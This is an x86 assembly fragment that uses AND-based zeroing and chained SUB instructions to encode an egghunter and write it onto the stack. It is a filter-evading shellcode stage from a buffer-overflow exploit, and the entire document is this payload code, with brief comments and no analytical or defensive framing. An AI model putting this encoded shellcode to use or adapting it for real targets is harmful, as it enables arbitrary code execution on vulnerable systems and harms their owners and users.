#We use register EAX
#First zero-out EAX
AND EAX, 0x554E4D4A
AND EAX, 0x2A313235
#Then set EAX to StackPointer
PUSH ESP
POP EAX
#Then create space on the stack for encoded shellcode, in this case 253 bytes
SUB EAX, 0x55554D66
SUB  EAX, 0x55554B66
SUB EAX, 0x5555506A
PUSH EAX
POP ESP
#Now we write the encoded egghunter to the stack
AND EAX, 0x554E4D4A
AND EAX, 0x2A313235
SUB EAX, 0x7C337C7C
SUB EAX, 0x7C01011D
SUB EAX, 0x08010101
PUSH EAX
AND EAX, 0x554E4D4A
AND EAX, 0x2A313235
SUB EAX, 0x7C7C7C7C
SUB EAX, 0x18304074
SUB EAX, 0x01010101
PUSH EAX
AND EAX, 0x554E4D4A
AND EAX, 0x2A313235
SUB EAX, 0x7C307C7C
SUB EAX, 0x54012A7C
SUB EAX, 0x01010106
PUSH EAX
AND EAX, 0x554E4D4A
AND EAX, 0x2A313235
SUB EAX, 0x7C7C7C7C
SUB EAX, 0x0E287C47
SUB EAX, 0x01010201
PUSH EAX
AND EAX, 0x554E4D4A
AND EAX, 0x2A313235
SUB EAX, 0x7C7C450F
SUB EAX, 0x522E0101
SUB EAX, 0x01010101
PUSH EAX
AND EAX, 0x554E4D4A
AND EAX, 0x2A313235
SUB EAX, 0x03727C7C
SUB EAX, 0x01012B53
SUB EAX, 0x01010101
PUSH EAX
AND EAX, 0x554E4D4A
AND EAX, 0x2A313235
SUB EAX, 0x4E137C4F
SUB EAX, 0x01010D01
SUB EAX, 0x01010101
PUSH EAX
AND EAX, 0x554E4D4A
AND EAX, 0x2A313235
SUB EAX, 0x157C167C
SUB EAX, 0x017C010E
SUB EAX, 0x01080101
PUSH EAX
